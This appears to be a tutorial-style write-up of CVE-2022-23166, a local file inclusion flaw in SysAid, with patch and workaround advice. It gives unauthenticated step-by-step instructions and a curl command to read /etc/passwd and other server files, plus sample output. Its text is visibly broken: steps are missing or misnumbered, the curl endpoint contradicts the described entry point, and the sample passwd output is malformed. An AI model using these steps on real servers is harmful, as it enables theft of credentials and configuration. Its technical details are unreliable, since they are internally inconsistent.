SysAid is a widely used IT Service Management software for help desks and IT service automation. In 2022, a critical security flaw was discovered in SysAid (CVE-2022-23166) that allows unauthenticated attackers to read sensitive files from the server using a Local File Inclusion (LFI) vulnerability. This article will walk you through the vulnerability, step-by-step exploitation using simple code snippets, and ways to protect your system.

What is CVE-2022-23166?

CVE-2022-23166 is a Local File Inclusion vulnerability affecting certain versions of SysAid. Due to improper access controls on the /lib/tinymce/examples/index.html path, attackers can open the TinyMCE "Insert/Edit Embedded Media" feature and load arbitrary files from the underlying server via the iframe option — no login required.

http://[TARGET-IP]/lib/tinymce/examples/index.html

You should see the TinyMCE editor demo, even if you're not logged into SysAid. This is the unauthenticated entry point for the attack.

In the editor, follow these steps

1. Click the _Insert/Edit Embedded Media_ button (looks like a film strip or media icon).

`

/windows/win.ini

`

/etc/passwd

`

3. Click OK. The content of the file should now be loaded in the editor preview.

3. Example Exploit

If you want to automate this for testing (or pentest in a legal environment), you could use a simple curl command:

curl "http://[TARGET-IP]/lib/tinymce/plugins/media/filepicker.php?file=/etc/passwd";

Or, if using a browser, just browse to /lib/tinymce/examples/index.html, open the media insert dialog, select "iFrame" and insert path like /etc/passwd or another file you want to read.

4. Screenshot Example

*You would now see the contents of /etc/passwd in the preview window — confirming the LFI vulnerability is present:*

root:x:::root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...

Attackers can use LFI to

- Grab sensitive files (/etc/passwd, configuration files, database credentials)

Original References and Resources

- CVE Details for CVE-2022-23166
- SysAid Security Advisory
- Full Exploit Writeup (Sec Consult)
- Proof of Concept (Packet Storm)

How to Fix CVE-2022-23166

Cloud Users:  
Update to version 22.2.20 or newer.

On-premise Users:  
Update to version 22.1.64 or newer.  
You can download the latest update from the SysAid download portal.

> Tip: Remove public access to /lib/tinymce/examples/index.html as a short-term workaround.

Summary Table

| Vulnerability | CVE-2022-23166: SysAid Local File Inclusion (LFI) |
|---------------|--------------------------------------------------|
| Affected Path | /lib/tinymce/examples/index.html                |
| Attack Vector | Unauthenticated, remote via iframe                |
| Risk          | Read arbitrary server files                       |
| Fixed Version | Cloud: 22.2.20; On-premise: 22.1.64               |
| Patch         | Update SysAid; restrict access to vulnerable path |

Final Word

CVE-2022-23166 is easy to exploit — and just as easy to fix if you act quickly. Always keep your SysAid environment up to date and restrict access to any test/demo pages in production.


*This article is for education and authorized security testing only. Never test these vulnerabilities on systems without explicit permission.*

- OWASP LFI Explanation
- TinyMCE Security Best Practices

Timeline

Published on: 05/12/2022 20:15:00 UTC
Last modified on: 05/23/2022 20:31:00 UTC